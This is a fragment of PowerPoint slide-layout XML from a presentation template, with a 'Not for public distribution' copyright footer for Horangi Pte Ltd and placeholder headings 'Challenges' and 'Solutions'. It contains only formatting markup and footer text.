                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Shape 268"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114700" cy="2739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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lora"/>
              <a:ea typeface="Lora"/>
              <a:cs typeface="Lora"/>
              <a:sym typeface="Lor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Title Only">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 269"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Shape 270"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2209500" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Shape 271"/>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3600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt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72" name="Shape 2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52400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-107950" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2" indent="-76200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" marR="0" lvl="3" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" marR="0" lvl="4" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>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273" name="Shape 273"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4767262"/>
            <a:ext cx="6000900" cy="273900"/>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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Shape 274"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114700" cy="2739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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lora"/>
              <a:ea typeface="Lora"/>
              <a:cs typeface="Lora"/>
              <a:sym typeface="Lor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1_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 275"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Shape 276"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431800" y="0"/>
            <a:ext cx="2146200" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="24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77" name="Shape 277"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3365500" y="1349375"/>
            <a:ext cx="5442000" cy="2444700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" marR="0" lvl="0" indent="-21590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1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-15875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2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2" indent="-10160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Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lor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78" name="Shape 278"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3050116" y="1349375"/>
            <a:ext cx="0" cy="2444700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="F2F2F2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="non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2_Title Slide">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4825996" y="1815059"/>
            <a:ext cx="3860700" cy="2444700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" marR="0" lvl="0" indent="-2286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1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-17145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2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="1600200" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="2057400" marR="0" lvl="4"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281" name="Shape 281"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1815059"/>
            <a:ext cx="0" cy="2444700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="A5A5A5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Shape 282"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1815059"/>
            <a:ext cx="3860700" cy="2444700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" marR="0" lvl="0" indent="-2286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1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-17145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2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="1600200" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="2057400" marR="0" lvl="4" indent="-114300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>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3" name="Shape 283"/>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84" name="Shape 284"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1319757"/>
            <a:ext cx="3860700" cy="410700"/>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2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Challenges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 285"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826010" y="1319757"/>
            <a:ext cx="3860700" cy="410700"/>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2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Solutions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Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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57200" y="1631950"/>
            <a:ext cx="3727500" cy="77460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Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt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88" name="Shape 288"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="3727500" cy="1092300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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457200" y="1631950"/>
            <a:ext cx="1981200" cy="774600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt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91" name="Shape 291"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="1981200" cy="1092300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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3_Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="lt1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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457200" y="1631950"/>
            <a:ext cx="1981200" cy="774600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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94" name="Shape 294"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="1981200" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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5_Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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457200" y="1631950"/>
            <a:ext cx="1981200" cy="774600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>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297" name="Shape 297"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="1981200" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="16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0" y="0"/>
            <a:ext cx="9144000" cy="5143499"/>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1"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4_Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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457200" y="1631950"/>
            <a:ext cx="1981200" cy="774600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>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00" name="Shape 300"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="1981200" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="16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6_Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="EEDDCE"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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457200" y="1631950"/>
            <a:ext cx="1981200" cy="774600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>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03" name="Shape 303"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="1981200" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="16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Blank">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="141414"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 304"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Shape 305"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4767262"/>
            <a:ext cx="6000900" cy="273900"/>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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Shape 306"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114700" cy="2739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lt1"/>
